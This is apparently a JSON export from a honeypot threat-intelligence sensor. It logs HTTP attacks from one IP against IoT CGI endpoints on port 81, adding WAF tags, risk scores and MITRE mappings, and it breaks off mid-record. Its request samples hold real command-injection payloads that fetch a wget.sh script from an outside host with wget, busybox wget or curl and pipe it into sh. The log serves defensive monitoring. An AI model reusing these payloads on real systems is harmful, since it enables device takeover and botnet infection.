{"ip":"45.156.87.213","exported_at":"2026-07-14T11:38:50+00:00","period_days":1,"metrics":{"events7d":47,"distinct_ports":1,"distinct_classifications":6,"max_severity":10,"last_sensor_id":"paris-1","max_waf_score":87,"max_risk_score":81,"attack_stage":"exploit_attempt","attack_chain_stage":"exploitation","threat_family":["path_traversal","config_leak_scan"],"recommended_action":"investigate","confidence":1,"risk_breakdown":{"waf":100,"classification":74,"behavior":0,"geo":0,"protocol":43,"novelty":30},"mitre_tactics":["TA0001","TA0002"],"mitre_technique":"T1083","top_mitre_technique":"T1059","top_mitre_count":23,"executive_one_liner_fr":"Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP","campaign_hint_fr":null,"confidence_breakdown":{"waf":100,"classification":74,"behavior":0,"geo":0,"protocol":43,"novelty":30,"risk_score":64},"persona_hostname":"mail.sensor-1.internal","correlation_flags":[],"correlation_flags_labels_fr":[],"confidence_pct":100,"confidence_hint_fr":null,"sensor_role_label_fr":"Renseignement menaces","tags_summary_labels_fr":["Http Sensitive","Upstream","Waf Score"],"tags_summary":["INT-http_sensitive","INT-upstream","INT-waf-score"],"attack_vector":"config file probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wg\u2026","protocol_details":{"http_method":"GET","http_path":"\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%\u2026","request_line":"GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bc\u2026","port":81,"service":"http","service_label_fr":"HTTP"},"protocol_summary_fr":"GET \/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%\u2026 \u00b7 HTTP:81","evidence_snippet":"GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb","target_port_label":"81 \u00b7 HTTP","emulator_service":"http","confidence_reason":"Confiance 100 % \u2014 9 tag(s) WAF","classification_reason":"Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%","classification_reason_label_fr":"Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%","confidence_factors_fr":"Confiance 100 % \u2014 Score WAF 100 \u00b7 9 tag(s) WAF","payload_preview":"GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb"},"events":[{"id":11860782,"ip":"45.156.87.213","ts":"2026-07-14 08:22:35.000000","proto":"tcp","src_port":60036,"dst_port":81,"service":"http","classification":"cmd_injection","waf_score":47,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/remote_link3.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00229d3dc4a8fb25011a455876c70b2b86adbab83cd0\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 320, \u0022payload_entropy\u0022: 5.205082925084848, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u002244975a8c148732922162b31805f6d2dc4dff1863\u0022, \u0022event_fingerprint\u0022: \u002279d8811d3bebaa8710debc3c6911d3bad9dd17ae\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022443abbd2ef51051cf19ca8ce4358217a\u0022, \u0022path_pattern_hash\u0022: \u0022d36ef7dbd432d8eb2261edf7e6706be8\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 1\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/remote_link3.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 167\\r\\nConnection: close\\r\\n\\r\\ncmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s iodata;busybox wget http:\/\/91.92.40.118\/wget.sh\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 1\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/remote_link3.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 167\\r\\nConnection: close\\r\\n\\r\\ncmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s iodata;busybox wget http:\/\/91.92.40.118\/wget.sh\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 1\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022a90823abb4eb74c2b375107062be4090876ffee4\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/remote_link3.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 1\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/remote_link3.cgi\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/remote_link3.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/remote_link3.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/remote_link3.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 1\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":320},{"id":11860783,"ip":"45.156.87.213","ts":"2026-07-14 08:22:35.000000","proto":"tcp","src_port":60038,"dst_port":81,"service":"http","classification":"lfi_path_traversal","waf_score":48,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022php\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u0022330403c8b337dfacdd10ced73c0bc7b3134b9027\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 276, \u0022payload_entropy\u0022: 5.037717612294259, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u002240be57c5e34efba92bded377cf31322c5002fb78\u0022, \u0022event_fingerprint\u0022: \u0022953f588117e8c44c1b1f09e6307dccc7f8e39fc9\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022c792ff692e05ad22a38ef54c99c84d6c\u0022, \u0022path_pattern_hash\u0022: \u00223dbc30808e9f368b04f77623e2b863af\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60\u0022, \u0022query_string\u0022: \u0022host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.4\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60\u0022, \u0022query_string\u0022: \u0022host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%60 HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nC\u0022, \u0022payload_snippet\u0022: \u0022GET \/action.php?host=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.4\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022bd1cc41aeeac74d145577b42774e6c517929a38f\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20mitsu%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20mitsu%\u2026\u0022, \u0022request_line\u0022: \u0022GET 